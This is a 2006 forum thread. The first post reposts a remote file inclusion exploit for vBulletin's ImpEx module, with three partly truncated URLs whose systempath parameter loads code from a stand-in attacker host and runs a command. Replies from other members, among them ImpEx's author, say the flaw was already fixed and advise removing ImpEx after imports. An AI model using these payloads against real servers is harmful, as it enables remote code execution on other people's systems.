3.5.4 vBulletin Exploit

NEWLiNE

New Member

Join Date: Dec 2005

Posts: 21
- Share
- Tweet
#1

3.5.4 vBulletin Exploit

Thu 25 May '06, 6:12am

I came across this on the internet...

Remote File Inclusion in VBulletin

version :

VBulletin 3.5.1
VBulletin 3.5.2
VBulletin 3.5.4

The bug reside in :

ImpExModule.php
ImpExController.php
ImpExDisplay.php

Exploit :

(1)
http://www.site.com/forum/impex/ImpE...hp?systempath=
class="fixed">http://www.host_evil.com/cmd?&=id

(2)
http://www.site.com/forum/impex/ImpE...hp?systempath=
class="fixed">http://www.host_evil.com/cmd?&=id

(3)
http://www.site.com/forum/impex/ImpE...hp?systempath=
class="fixed">http://www.host_evil.com/cmd?&=id
Tags: None
Boxy

Senior Member

Join Date: Oct 2002

Posts: 3139
- Share
- Tweet
#2

Thu 25 May '06, 8:33am

This was fixed a little while back.
Comment
Jerry

Senior Member

Join Date: Dec 2002

Posts: 9138
- Share
- Tweet
#3

Thu 25 May '06, 12:19pm

Indeed, this was fixed a while ago, and to clarify its was an issue with ImpEx not vBulletin itself.

ImpEx should always be removed after an import is successful.

I wrote ImpEx.

Blog | Me
Comment

Announcement